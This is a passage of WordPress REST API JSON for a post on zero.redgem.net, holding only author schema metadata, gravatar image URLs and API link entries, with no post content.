redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46752","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=46752"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46752\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=46752"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=46752"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=46752"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}